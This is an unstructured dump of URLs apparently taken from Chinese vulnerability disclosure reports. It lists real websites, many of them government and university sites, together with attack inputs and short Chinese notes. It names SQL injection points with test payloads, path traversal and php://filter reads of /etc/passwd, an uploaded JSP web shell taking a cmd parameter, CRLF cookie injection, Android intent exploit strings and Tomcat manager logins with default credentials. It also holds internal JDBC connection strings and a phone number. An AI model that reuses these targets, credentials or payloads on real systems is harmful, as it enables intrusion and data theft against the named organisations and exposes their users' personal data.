jdbc:oracle:thin:@123.125.16.139:1540:zxdb http://www.seip.org.cn jdbc:mysql://192.168.1.102:3309/usp jdbc:mysql://10.1.1.15:3306/seip_db2?useUnicode=true&characterEncoding=GBK http://www.tjnklss.gov.cn/gonggao/gonggao_detail.asp?id=144 http://www.yp.edu.sh.cn/magazine/IssueDetail.aspx?iid=18535f3a-6d13-4428-be7d-63093c1ae689 http://wzmis.ctbu.edu.cn/showc.aspx?cid=2437 http://wenwen.sogou.com/z/q478438204.htm http://www.windexpress.cn/ http://120.193.64.194:8088/serverLog.do msgid:262 num:260mobile:15007533209 http://202.103.194.214:8003/ http://art.buaa.edu.cn/english/js/diy3.asp http://art.buaa.edu.cn/english/js/no22.asp http://www.creditcard.com.cn/plus/mytag_js.php?aid=9090 http://www.hedb.xmu.edu.cn/admin_info.asp http://www.hedb.xmu.edu.cn http://www.hedb.xmu.edu.cn/admin_data.asp http://www.hedb.xmu.edu.cn/admin_data.asp?action=BackupData http://www.hedb.xmu.edu.cn/admin_data.asp?action=RestoreData http://www.hedb.xmu.edu.cn/admin_login.asp http://www.hedb.xmu.edu.cn/admin_info.asp http://www.hedb.xmu.edu.cn/conn.asp http://www.hedb.xmu.edu.cn/data.asp http://www.hedb.xmu.edu.cn/database/ http://www.hedb.xmu.edu.cn/default.asp http://www.hedb.xmu.edu.cn/default2.asp http://www.hedb.xmu.edu.cn/down.asp http://www.hedb.xmu.edu.cn/editor/ http://www.hedb.xmu.edu.cn/image/ http://www.hedb.xmu.edu.cn/inc.asp http://www.hedb.xmu.edu.cn/info.asp http://www.hedb.xmu.edu.cn/left.asp http://www.hedb.xmu.edu.cn/md5.asp http://www.hedb.xmu.edu.cn/s/ http://www.hedb.xmu.edu.cn/stat/ http://www.hedb.xmu.edu.cn/test.asp http://www.hedb.xmu.edu.cn/top.htm http://www.hedb.xmu.edu.cn/temp.asp http://www.hedb.xmu.edu.cn/temp/ http://www.hedb.xmu.edu.cn/upfile/ http://www.hedb.xmu.edu.cn/update.asp http://www.hedb.xmu.edu.cn/web.config http://www.hedb.xmu.edu.cn/admin_admin.asp http://www.hedb.xmu.edu.cn/database http://www.hedb.xmu.edu.cn/admin_index.asp http://www.hedb.xmu.edu.cn/Editor http://www.hedb.xmu.edu.cn/image http://www.hedb.xmu.edu.cn/s 
http://www.hedb.xmu.edu.cn/stat http://www.hedb.xmu.edu.cn/temp http://www.hedb.xmu.edu.cn/reports/ http://www.hedb.xmu.edu.cn/reports http://www.hedb.xmu.edu.cn/q/ http://www.hedb.xmu.edu.cn/admin_main.asp http://www.hedb.xmu.edu.cn/q http://www.zinfos.net/Product/cp1/ http://www.bjut.edu.cn/department/gjjlhzc/wsc/WEB-INF/classes/com/mysql/jdbc/Buffer.java http://rsc.henu.edu.cn/ http://rsc.henu.edu.cn:8080/FileResource/ http://rsc.henu.edu.cn:8080/FileResource/7452/ http://rsc.henu.edu.cn:8080/FileResource/7452/Aspx.aspx http://bmd.yunhosting.com/,抓包后发现是境外转发申请平台proxymaster.hk.yunhosting.com,测试如下: http://proxymaster.hk.yunhosting.com http://202.120.81.220:81/xsgz/news/news_details.php?news_id=45 http://202.120.81.220:81/xsgz/notice/notice_details.php?notice_id=45 http://202.120.81.220:81/xsgz/jobinfo/jobs_details.php?info_id=34 http://www.haxx.lss.gov.cn/msg/more.php?SortID=12 http://life.gwbnsh.net.cn/index.action http://zkzs.nau.edu.cn/ http://zkzs.nau.edu.cn/1/sm.asp?id=3 http://voice.sohu.com/tree/page.php?id=diissrld&beg=0&end=20 http://ifl-info.ecupl.edu.cn/searcharticle.asp?WhichLanmu=6&WhatToSearch=All&WhichYear=9999 http://www.fj.vnet.cn/wj/Page/DigPrize.aspx?id=1 http://www.fj.vnet.cn/wj/Page/DigPrize.aspx?id=1 http://59.151.119.94:8081/cloud/questionnaire/doQuestionnairePreview.action?questionnaireId=11&caseId=123&customerId=9396 http://218.25.83.8/fcjxyjs/index.jsp http://bb.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=1 http://www.sdx.sh.cn/tg/loginLogoutAction_loginUI.action http://www.1caitong.com/ inurl:/custom/GroupNewsList.aspx http://eps.umgg.com.cn/custom/GroupNewsList.aspx?groupId=121&child=true http://eps.csrcj.com/custom/GroupNewsList.aspx?GroupId=141&child=true http://eps.rizhaosteel.com/custom/GroupNewsList.aspx?GroupId=142&child=true http://azbid.zj31.com.cn/custom/GroupNewsList.aspx?GroupId=58&child=true http://eps.zzvcom.com/custom/GroupNewsList.aspx?GroupId=142&child=true http://www.daqobid.com/custom/GroupNewsList.aspx?GroupId=142&child=true 
http://eps.delongsteel.com/custom/GroupNewsList.aspx?GroupId=140&child=true http://zh404eps.cn/custom/GroupNewsList.aspx?groupId=58&child=true http://www.sdlg.info/custom/GroupNewsList.aspx?GroupId=58&child=true http://eps.xinjinsteel.com:90/custom/GroupNewsList.aspx?GroupId=141&child=true http://jingpai.datuhe.com/custom/GroupNewsList.aspx?GroupId=142&child=true http://wscg.hgfq.cn/custom/GroupNewsList.aspx?GroupId=141&child=true http://www.lzpbzx.com/custom/GroupNewsList.aspx?GroupId=148 http://eps.eastcom.com/custom/GroupNewsList.aspx?GroupId=181 http://wscg.hgfq.cn/custom/GroupNewsList.aspx?companyId=&child=true&buyGroupid=1302&groupId=38 https://eps.xd.com.cn:8084/custom/GroupNewsList.aspx?GroupId=114&buyGroupId=1178 http://ygcg.xuangang.com.cn/custom/GroupNewsList.aspx?typeObj=t58&groupId=58 http://jingpai.datuhe.com/custom/GroupNewsList.aspx?GroupId=142&child=true http://cg.bjxinheng.com:8000/custom/GroupNewsList.aspx?GroupId=58&child=true http://218.203.215.218/custom/GroupNewsList.aspx?GroupId=58&child=true http://eps.xltl.com.cn/custom/GroupNewsList.aspx?typeObj=t58&groupId=58 http://www.dyqyfw.gov.cn http://sse1.paipai.com/0,6001/s-2c4po1bq1su59ql--1-60-77-6001--3-4-1----2-2--128-1-0.html?PTAG=%0aSet-Cookie:%20badcookie=attack_here;path=/;%20domain=.paipai.com http://61.133.142.61/uniszx/common/user/loginpage.html http://61.133.142.61/uniszx/common/user/user!query.action?id=5 http://61.133.142.61/uniszx/common/user/user!query.action?id=1 http://61.133.142.61/uniszx/common/user/user!query.action?id=2 http://61.133.142.61/uniszx/common/user/user!query.action?id=3 http://61.133.142.61/uniszx/common/user/user!query.action?id=xxx http://61.133.142.61/uniszx/common/user/user!query.action http://zscq.e23.cn/shownews.jsp?NewsID=640 http://zscq.e23.cn/Search.jsp?page=1&keyword= http://www.***.com/hyl/Lists/List1/Allitemsg.aspx http://www.ciscouc.com/aboutView.jsp?id=1 http://www.xanet.net/case.php 
http://www.168myjob.com/topic.php?action=show&channelID=3&topicID=4&zpID=7822 http://www.168myjob.com/topic.php?action=show&channelID=3&topicID=4&zpID=99999999 http://www.168myjob.com/topic.php?channelID=9&topicID=24 http://www.jnjt.gov.cn/Web/Area.aspx?area_code=XXGK http://progress.eic.org.cn/index.php/index/login https://github.com/NewNapoleon/test/blob/b27de80c43471ff1db03ef8ee5b79126ddf2491c/eleveninfoASS.py http://nanhu2.com.cn/ewebeditor/admin http://app.image.baidu.com/photos/LOGIC/webapp/download.php?download_url= http://www.10086-sms.com/superadmin/index.action http://www.idexpress.com.cn/cgi-bin/GInfo.dll?WebPic&w=shkdwy&order=通过该注入点可以获得该网站的八个数据库,六百多张表,包含很多公司的业务信息和客户信息,而且通过该注入点得到的权限就是管理员权限,无需提权可以直接获得大量数据。 http://x.sankuai.com/app/colleague?toolbarVisible=0&titlebarVisible=0 http://xai.xm.sankuai.com/app/rookie?type=1&offset=0&limit=20 https://github.com/baotiao/Asenal/blob/f623256b7c420b7cebe02f26cc6d03c2fde91113/script/python/server.py http://www.lyfz.gov.cn/xl.txt http://www.lyfz.gov.cn/xl.asp http://58.213.19.85/ http://www.wooyun.org/bugs/wooyun-2014-073659/trace/9b8168bb886443ec301bc0fd783bc9b5 www.hrbnu.edu.cn,大学一般都是有内网的。 http://jy.hrbnu.edu.cn这个二级域名有注入。是个帝国cms的站,管理员关闭的PHP错误,所以没找到路径,写不了shell,找到了PHPMYADMIN,于是就试试写UDF提权,随然没成功,但是把操作也记录下; http://qixiang.heshan.gov.cn/admin/admin.asp?logout=true http://h.bilibili.com/list?uid=4514 http://oa.bjhospital.net/ http://189.180.16.235/ http://113.182.179.91/ http://187.148.169.94/ http://175.141.5.65/ http://music.google.cn/search?newwindow=1&q=inurl%3Afunonews.ASP%3FID%3D&btnG=Google+%E6%90%9C%E7%B4%A2 http://lib.hebiace.edu.cn/dzb/admin/chklogin.asp?password=1&Submit=%c8%b7%20%b6%a8&admin=1 http://www.71etop.com/index.php url:http://125.88.10.244:8081/manager/html user:admin url:http://222.74.204.45:8081/manager/html user:tomcat pass:tomcat http://xmsc.zhuzhou.gov.cn/ArticleMocn.asp http://doc.baidu.com/view/7826b53c580216fc700afdab.html 
http://info.pinyin.sogou.com/ime_push/getxinci.php?activeprocess=Wireshark.exe&adurl=http://info.pinyin.sogou.com/ime_push/sgse_ad/sgse_s_all_new.php&configver=361&h=7E4AF9C13B1A52DB231E36F25A5A2038&id=Y10000001&newwordver=1408768246&pageurl=../../../../../../../../../../etc/passwd&passport=&ppversion=3.0.0.1825&r=0000_&v=7.2.0.2394 http://info.pinyin.sogou.com/ime_push/getxinci.php?activeprocess=Wireshark.exe&adurl=http://www.lijiejie.com/&configver=361&h=7E4AF9C13B1A52DB231E36F25A5A2038&id=Y10000001&newwordver=1408768246&pageurl=link_index_new.php&passport=&ppversion=3.0.0.1825&r=0000_&v=7.2.0.2394 http://www.gxtcmu.edu.cn/show_bosi.aspx?id=9076 http://xiaoli.xidian.edu.cn/inc/js.php?id=1 http://www.jletc.gov.cn/showgg.php?id=39240 http://218.206.191.49:8001/login.do http://218.206.191.49:8001/login.do?userPassword=123456789&userCode=1 http://cslab.hitwh.edu.cn/admin/ http://jpkc.whcm.edu.cn/Course/admin_login.asp http://mail.whcm.edu.cn/manage/login.aspx http://wcm.gdf.gov.cn/tbtj/tbtj.php?id=15 http://61.128.198.132/ http://www.sast.org.cn/index.php?id=2025&action=detailPage&type=article&part_id=120 http://209.150.97.19/(美国一个机房) http://134.147.166.17/ http://207.255.179.97/ http://81.10.188.54/(奥地利的公路) http://210.128.213.133/(日本,办公室,晚上都下班了,所以看不见人) http://160.194.154.57(日本Meisei http://g.tffstore.com http://gyjdi.jmu.edu.cn/information_more.php?id=44 http://60.28.168.181:8081/ http://210.22.8.98/login.action登陆界面,依然没有验证码,可以爆破,但是这样有些太蠢了,灵光一现,试试万能密码! 
http://star.umiwi.com/ http://star.umiwi.com/tools/main.php?func=starinfo http://star.umiwi.com/tools/main.php?func=add http://flagnet.imu.edu.cn/tuangongwei/index.html inurl:Flight/DomesticTicketTejia.asp http://demo1.huaruisoft.com/ http://demo1.huaruisoft.com/news/NewsList.aspx?KeyWord=__sqlin__ http://www.visioninnovation.com.cn/topic.php?channelID=6&topicID=13 http://www.sdta.gov.cn/ http://admission.whu.edu.cn/CooCourseView.aspx?id=181 http://www.tyut.edu.cn/slxy/infoshow.asp?id=917&typeid=1&smallid=58 https://vpn.airchinaf.com/prx/000/http/localhost/login http://bbs.pigai.org/ http://61.161.127.159/bizom/pages/login.do http://58.68.255.135 http://58.68.255.136 http://58.68.255.137/ http://58.68.255.138/ http://58.68.255.148/admin http://58.68.255.149/Login.aspx?ReturnUrl=%2fdefault.aspx http://jpkc.bsu.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://www.eol.sdu.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://eol.hgzyxy.com/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://eol.ynufe.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://cc.ustb.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://aaol.imust.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://course.pkuschool.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://jxpt.cuc.edu.cn/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://116.252.254.221:8024/eol/common/script/search.jsp?folderid=0&groupid=4&lid=4452 http://www.diancms.com/jiaocheng.aspx http://demo.zoomla.cn/Mis/OA/ http://demo.zoomla.cn/User/UserZone/Default.aspx http://mkszyxy.cug.edu.cn/showart.asp?id=272 http://www.ahjzy.com.cn/news/showart.asp?id=1080 http://www.28ka.com inurl:linklist.asp?TlinkID= inurl:PositionSeek.asp http://jy.sthu.edu.cn http://zczx.lzu.edu.cn/register/manager/eregisterstu/studentERegisterCanSee.do?id=1088367&see=0&=0&fromBase=1 
http://zczx.lzu.edu.cn/register/manager/eregisterstu/studentERegisterCanSee.do?id=1088367&see=0&isAdmin=0&fromBase=1 http://zczx.lzu.edu.cn/register/manager/eregisterstu/studentERegisterCanSee.do?id=1088366&see=0&isAdmin=0&fromBase=1 http://www.edong.com/Host/Gspace_list.aspx?Product_ClassId=1&line_Id=3 http://routes.sdta.cn/da3/client/shandong/tjxl/query.action http://sys.59.cn/system/login.asp http://sys.59.cn/system/Login_CK.asp http://sys.59.cn/system/login.asp http://www.snepb.gov.cn/tsxx.asp?id=103838 http://hao.ikang.com http://hao.ikang.com/?city=0021&Action=Operator&hospid=002 http://121.28.83.66:8080/zfba/stdownload.jsp?path=uploadFile/file5e8082408319.doc http://121.28.83.66:8080/zfba/stdownload.jsp?path=stdownload.jsp http://121.28.83.66:8080的tomcat配置也是够懒的。。。 http://www.pigai.org/corpus/star/index.php?q=crisis&pageno=2 http://xxoo.com/v1.php tel:10086 http://www.pigai.org/corpus/so/snt.php?q=consider&corpus=sino&pageno=2 http://218.241.158.242/ http://www.1ysg.com/statics/uploads/touimg/20140825/22416063969950.jpg_160160.PHP黑页已挂你懂得,利用审查元素修改头像的后置。很鸡肋的漏洞, www.gysjks.com itsm.wisedu.com/detach.portal?.pen=pe81&.ia=false&action=bulletinBrowser&.pmn=view&bulletinId=0261e216-f149-11df-b88f-253e3a651013 http://project.wisedu.com/ http://202.38.194.239/index.aspx http://202.38.194.239/admin/.l.o.g.i.n.scut-graduate http://202.38.194.239/admin/admin.asp http://xxyxjc.miit.gov.cn/ http://xxyxjc.miit.gov.cn/core/index/login.jsp http://xxyxjc.miit.gov.cn/ckeditor/uploader/upload/images/file1408973312330.jsp?cmd= http://xxyxjc.miit.gov.cn/ckeditor/uploader/upload/images/file1408976269908.html http://rexian.e23.cn/list.jsp?cid=7722 http://110.167.173.18/default.asp http://125.**.**.5:7001/ismp/spportal/ http://dg.jjcmw.cn/plus/mytag_js.php?aid=9090 www.jiathis.com某过期活动页面可导致sql注入(POST方式),仅jiathis业务有近50w条客户数据泄漏。后台管理权限泄漏,可更改任意用户信息及运营数据。 http://www.jiathis.com/event/iphone5/ http://www.tzlxx.cn/ http://**.**.**/_ http://**.**.** http://**.**.** http://**.**.** 
http://**.**.**/ http://www.cs2c.com.cn/index.php?id=117 http://sqlmap.org http://qcyg.e23.cn/phpsso_server/?m=admin&c=index&a=init&forward= cn:9080/ com.tencent.mtt/com.tencent.mtt.debug.DbgMemWatch;end android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;end intent:http://drops.wooyun.org/webview.html#Intent;component=com.android.browser/com.android.browser.BrowserActivity;end intent:package:org.wooyun.hiwooyun#Intent;action=android.intent.action.DELETE;end http://www.0745kttz.com/front/aboutUs/aboutUs.php?compTypeId=9 http://www.0745kttz.com/front/helpCenter/help.php?TypeId=27 http://www.0745kttz.com/front/news/newsList.php?parentID=25 http://0745hhszx.china720.cn/news.php?menuId=2 http://0745hhszx.china720.cn/zzgc_xx.php?menuId=9 http://0745hhszx.china720.cn/company_xx.php?menuId=1 http://www.720mt.com/ctmt.php?id=0 http://www.720mt.com/news_show.php?id=98 http://www.720mt.com/xxmt.php?id=4 http://8327.china720.cn/run.php?partid=1 http://www.yywysj.com/run.php?partid=4 http://www.hhgjdf.com/run.php?partid=1 http://www.kakazhou.com/run.php?partid=19 http://www.hhhljt.com/run.php?partid=2 http://zhiyuanrenli.com/run.php?partid=2 http://sai-shuo.com/run.php?partid=1 http://www.hhsjx.cn/run.php?partid=2 http://ggsfys.hhwanchang.com/run.php?partid=21 http://www.4008800410.com/run.php?partid=2 http://www.aifeicm.com/run.php?partid=1 http://www.95hds.com/run.php?partid=13 http://hhxlsj.com/run.php?partid=2 http://mili.umiwi.com/card/usercard http://star.umiwi.com/tools/result.php http://i.g-fox.cn/i.g-fox.cn.zip http://222.32.90.7:8080/Default.aspx http://222.32.90.7/Default.aspx www.suaee.com http://211.137.254.234:9090/ http://www.gtzy.hunan.gov.cn:8080/wcm/ http://www.basha.com.cn)里面啥都有啊,送礼专用啊,看着好眼馋啊。 http://pay.basha.cn/basha/PayRedirect.aspx?no=M14082661458),手一滑,打出一个分号。就报错咯。 http://oa.shunhengli.com:9090/sys/sortListUI.jsp?searchKeyvalue=1&lx=1 
http://www.sdx.sh.cn/apex-cms/reg.jsp http://shop.pep.com.cn/ http://mec.ikang.com/showexam_exam.php?v=11032128&uname=kefupeixun&uid=11760 http://mec.ikang.com/showexam_exam.php?v=11032128&uname=kefupeixun&uid=11760 http://mec.ikang.com/showexam.php http://mec.ikang.com/showexam_exam.php?v=11032128&uname=kefupeixun&uid=11760 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://app.sxfc.gov.cn/Services/VoteResult.jsp http://www.hotouzi.com/customers/index.html http://mail.tsari.tsinghua.edu.cn/ http://national-life.ikang.com/admin http://42.120.***.** http://www.cqcca.com/phpmyadmin/index.php?db=cqccadb2&token=7b77aaf405271a03037e251f359510a7 www.neitui.me http://www.neitui.me http://m.xabaili.com http://m.xabaili.com/shop/detail.php?goods_id=80 http://webmail.xabaili.com/index.php http://mail.xabaili.com/update/ post:http://www.128cai.com/bbs/faq.php http://oa.homevv.com/login.jsp http://oa.homevv.com/attachFiles/uploadDocument/201408/452bc858929d4b069a85e30fc138a434.jsp http://www.pengpengmall.com/mall/goods/help/index.html?id=3462617 http://wenwen.sogou.com/cate/?cid=323551232&pg=1 http://wenwen.sogou.com/z/q589887143.htm?ch=wtk.title&lightframework=on http://wenwen.sogou.com/z/q589887181.htm?ch=wtk.title&lightframework=on site:health.ikang.com http://qq.health.ikang.com/loginui http://baidutj.health.ikang.com/loginui http://nyfesco.health.ikang.com/loginui http://ibm.health.ikang.com/loginui http://www.samsoncn.com/ http://www.samsoncn.com/product/Customers.aspx http://tis.hrbeu.edu.cn http://www.cjebm.org.cn http://xbskb.ysu.edu.cn http://www.j-smu.com http://www.hxyxqk.com.cn http://heuxb.hrbeu.edu.cn http://lkkf.njfu.edu.cn http://www.psytxjx.com http://www.xfcjwkzazhi.cn http://www.zgpwzz.com http://jee.ieecas.cn http://xxzz.cintcm.com http://www.ydsjjs.com http://yxxb.xjtu.edu.cn http://jxyj.ysu.edu.cn http://xb.hznu.edu.cn http://emc.hrbust.edu.cn http://www.zgxxwkzz.com http://www.syfsxzz.com.cn 
http://gjzy.cintcm.com http://www.cjam.net.cn http://www.qbzz.org http://www.cibj.com http://www.zgmnwk.com http://xbskb.jssvc.edu.cn http://www.jwit.org.cn http://xbskb.jssvc.edu.cn http://xbzrb.tjujournals.com http://www.cjcep.com http://www.fmmuxb.cn http://dlxb.nefu.edu.cn http://qhxb.lib.tsinghua.edu.cn http://slgc.nefu.edu.cn http://jjlyj.csuft.edu.cn http://hlgxb.hrbust.edu.cn http://www.cjrccm.com http://xbzkb.jssvc.edu.cn http://xuebao.ysu.edu.cn http://www.ddgzyckx.com http://www.lsjg.cn http://jhau.paperopen.com http://skxb.csuft.edu.cn http://zgwstj.paperonce.org http://nldxb.njfu.edu.cn http://xuebao.zjc.edu.cn http://journal.lut.cn http://xxgk.yuanan.gov.cn/gov/setup/index.html http://222.134.129.66:800/Initial/Login.aspx,点击“忘记密码”,输入用户名(随意输入)和邮箱(格式要正确)抓包,tbxName存在注入。POST内容如下 http://222.134.129.66:800 http://www.bjguahao.gov.cn/ url:http://60.216.102.82:80/manager/html user:admin https://ddp.volvocars.com/login.action http://210.42.27.60:8081/news_info.jsp?news_id=309 http://service.clo.com.cn/ http://service.clo.com.cn/Common/EventDtl/Event_Dtl.aspx?ServiceCode=FW00000001 http://service.clo.com.cn/Common/EventDtl/Event_Dtl.aspx?ServiceCode=FW00074415 http://mail.bdtvu.net.cn/webmail/login9.php http://202.102.41.12:8180/ http://202.102.41.12:8180/uc_server/ http://202.102.41.12:8180/admin.php http://202.102.41.12:8180/t.php http://202.102.41.12:8180/kh/ http://183.61.117.149:8080/ http://124.205.115.175/login.jsp url:http://124.205.115.175:80/manager/html user:tomcat pass:tomcat http://124.205.115.175/system/ http://www.pdsdxscg.cn/article.asp?id=1004 http://www.pdsfgw.gov.cn/article.asp?id=1199 http://www.pdssl.gov.cn/Article.Asp?id=1349 http://www.hnfljt.cn/article.php?id=1057 http://www.zhimabai.com/article.asp?id=487 http://www.hnxp666.com/Article.Asp?id=6475 http://www.3156777.com/article.asp?id=151 http://www.pdstyyp.com/Article.Asp?id=547 http://zgyuanfeng.com/Article.Asp?id=6594 http://hbgjdx.com/Article.Asp?id=6548 
http://www.pdszygz.com/article.asp?id=1274 http://fx-jc.com/Article.Asp?id=347 http://www.pdsxj.com/article.asp?id=7433 http://brtjckj.pdswzjs.com/Article.Asp?id=146 http://www.hnzxzj.com/article.asp?id=6613 http://pdsyhy.com/Article.Asp?id=123 http://www.hnzpzb.com/article.asp?id=2045 http://www.hnsyyy.net/Article.Asp?id=6790 http://www.yuesun.com.cn/Article.Asp?id=172 http://www.xiaolufushi.com/Article.Asp?id=6679 http://www.huashunsy.com/Article.Asp?id=6492 http://juyuankangye.com/Article.Asp?id=129 http://pdsycy.com/article.asp?id=744 http://yb0953.com/article.asp?id=6522 http://www.zykjgl.com/Article.Asp?id=6717 http://www.hoboc.net/Article.Asp?id=6589 http://pdsgz.com.cn/weuzhangArticle.Asp?id=6607 http://www.shenzhenshuikong.com/article.asp?id=559 http://www.pdshkdc.com/Article.Asp?id=6616 http://www.pdsqysy.com/Article.Asp?id=143 http://hnadsc.com/article.asp?id=466 http://agent.ikang.com/index.php?Action=DoLogin&Module= http://agent.ikang.com/info.php http://ecard.sdut.edu.cn/Index_ShowNews.aspx?NewsCode=269 http://www.zparkhr.com.cn/data/ http://www.ccbooknet.com http://124.133.54.4:8080/ http://mail.xhby.net/admin/ http://www.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1 http://zx.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1342 http://xc.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1460 http://lgb.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1619 http://xcb.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1619 http://kexie.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=951 http://english.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1633 http://phcoop.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=268 http://a.ikangdental.com/ http://a.ikangdental.com/Account/ http://a.ikangdental.com/GGXX/ http://a.ikangdental.com/GGXX/List.aspx?id= http://a.ikangdental.com/GGXX/List.aspx?id=12%20AND%203*2*1%3d6 http://a.ikangdental.com/GGXX/List.aspx?id=12%20AND%203*2*1%3d2 
http://stuhome.ustc.edu.cn/存在SQL注入漏洞,通过注入可以获取网站架构信息、数据库信息、账户密码信息等。网站注入点为 http://stuhome.ustc.edu.cn/list.php?cid=5 http://tprc.org.cn http://oa.zikeys.com/ http://zikeys.cn http://zdyn.com.cn http://www.argers.com http://nea.org.cn http://sprove.com http://www.ld-home.com/ http://jwc.bfa.edu.cn/default5.aspx inurl:article.php?MsgId= http://www.hxjjjc.gov.cn/article.php?MsgId=70313 http://www.ahjjjc.gov.cn/article.php?MsgId=84729 http://www.whjjw.gov.cn/article.php?MsgId=92248 http://www.hnsjw.cn/article.php?MsgId=94493 http://www.szsjw.gov.cn/article.php?MsgId=94028 http://www.dsjjjc.gov.cn/article.php?MsgId=80542 http://www.aqtcjjjc.gov.cn/article.php?MsgId=92276 http://m.xflz.gov.cn/list.asp?type=2&c=20107895055150 http://m.wznlw.gov.cn/list.asp?type=2&c=20107895055150 http://m.ypbxygw.gov.cn/list.asp?type=2&c=20107895055150 http://m.wtlz.gov.cn/list.asp?type=2&c=20107895055150 http://m.dxyglz.gov.cn/list.asp?type=2&c=20111588089187 http://mkl.xznlw.gov.cn/list.asp?type=2&c=20107895055150 http://mpg.xznlw.gov.cn/list.asp?type=2&c=20144636617408 http://mbd.xznlw.gov.cn/list.asp?type=2&c=20107895055150 http://www.xupudj.net/list.asp?type=%C8%CB%CA%C2%D6%C6%B6%C8&id=61 http://m.nwygnlw.gov.cn/list.asp?type=2&c=20107895055150 http://www.hs1861.com/info/list.asp?news_id=1301 file:///etc/passwd http://www.ctaxnews.com.cn/zt/template/list/nt_list.jsp?ID=37&ZTID=12 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.cxyd188.com/login.php inurl:space_inc/tp.jsp?infoId= http://www.hshsh.pudong-edu.sh.cn/bl/space_inc/tp.jsp?infoId=info150000 http://www.sqlmap.org www.hshsh.pudong-edu.sh.cn\session http://tc.xmjs.gov.cn http://tc.xmjs.gov.cn/Parking/Regist_cmpservice.aspx http://tc.xmjs.gov.cn/Parking/Cmp_info.aspx 
inurl:/index.asp?newsid= inurl:/index.asp http://www.jhlawfirm.cn/jhlaw2/intro/index.asp?newsid=1 http://www.jhlawfirm.cn/jhlaw2/lawyers/index.asp?categoryid=19 http://www.jhlawfirm.cn/jhlaw2/case/index.asp?typeid=1 http://www.ccbrr.com/yklaw/yuandi/index.asp?categoryid=73 http://www.sqlmap.org www.ccbrr.com\session http://ime.files2.sogou.com/sogou_pinyin_7.2.0.2935_chup.exe http://ime.files2.sogou.com/sogou_pinyin_7.2.0.2935_chup.exe http://www.iebcc.com/ http://123.103.21.91/ http://vote.pigai.org/Home/index.php?s=/Qa/index/id/34 http://dwz.cn/lhNra http://wd.koudai.com/vshop/1/H5/kd.html?s=bsmym9GnsN5NhBlDLFkQTg%3D%3D http://www.guifeng.net/index.html http://topic.it168.com/game/snapdragon1211/getdata.ashx?jsoncallback=?&articleTypeId=1 http://xianguo.com/my/opml http://1v4n.sinaapp.com http://1v4n.sinaapp.com/xxxxxxx php://filter/read=convert.base64-encode/resource=file:///etc/passwd http://1v4n.sinaapp.com/xxe/evil_php.xml http://de.appchina.com http://de.appchina.com/feed/ http://www.ellechina.com/?s_cid=xianguolife http://www.ellechina.com/xml/rss/xianguo_life_rss.xml http://yidacms.com http://www.sooka.com.cn/ http://www.shuangyang.gov.cn/ http://www.shuangyang.gov.cn/search.jsp?key=a'&type=1&x=7&y=4 http://www.lnsds.gov.cn/jis/objectbox/selx_userlist.jsp?fn_Keywords=1 http://www.lnsds.gov.cn/jis/objectbox/selx_userlist.jsp?fn_Keywords=1 http://www.pigai.org/index.php?c=teacher&a=requestviewall&sts=2&id=5 http://www.pigai.org/index.php?c=teacher&a=requestviewall&sts=2&id=5 url:http://202.108.90.135:80/manager/html user:admin pass:admin http://202.108.90.135/gsApp/ user:admin pass:admin https://zk.szsi.gov.cn/jrsbksb/dwlogin.action https://zk.szsi.gov.cn/jrsbksb/dwlogin.action 
jar:/bea/user_projects/domains/JRSBKSB_9002/lib/util400.jar:/bea/user_projects/domains/JRSBKSB_9002/lib/antlr-2.7.6.jar:/bea/user_projects/domains/JRSBKSB_9002/lib/commons-lang-2.3.jar:/bea/patch_wls1035/profiles/default/sys_manifest_classpath/weblogic_patch.jar:/bea/jdk160_24/lib/tools.jar:/bea/wlserver_10.3/server/lib/weblogic_sp.jar:/bea/wlserver_10.3/server/lib/weblogic.jar:/bea/modules/features/weblogic.server.modules_10.3.5.0.jar:/bea/wlserver_10.3/server/lib/webservices.jar:/bea/modules/org.apache.ant_1.7.1/lib/ant-all.jar:/bea/modules/net.sf.antcontrib_1.1.0.0_1-0b2/lib/ant-contrib.jar:/bea/wlserver_10.3/common/derby/lib/derbyclient.jar:/bea/wlserver_10.3/server/lib/xqrl.jar http://ah.189.cn/service/pay/newpayment.action http://ah.189.cn/service/pay/findByUser.action?userInfo.loginType=4&userInfo.serviceNbr=18055811112&flag=0&chargeType=1&key=a410f09e94b09772b6339561443dbf70 http://ah.189.cn/jsp/payment/newbankcard/js/newpayment.js http://home.aipai.com/28857310?action=updateInfo&sub=password inurl:index.php?g=Home&m=Index&a=help inurl:login http://www.fifee.com/ http://222.85.126.230:8080/ekbs/ask/userCenterAction.action?method=getTop100Account http://wooyun.org/bugs/wooyun-2010-040424和http://wooyun.org/bugs/wooyun-2010-026176 http://edm.wowsai.com/ http://edm.wowsai.com/.svn/entries http://zq.e23.cn/bbs/viewthread.php?tid=118916&page=1&extra=#pid217929 http://zq.e23.cn/bbs/index.php http://sgsj.gov.vn http://urp.hebau.edu.cn https://github.com/knownsec/KCon/blob/master/KCon%20V3/%E5%8E%BB%E5%B9%B4%E8%B7%A8%E8%BF%87%E7%9A%84%E5%AE%A2%E6%88%B7%E7%AB%AF.pptx 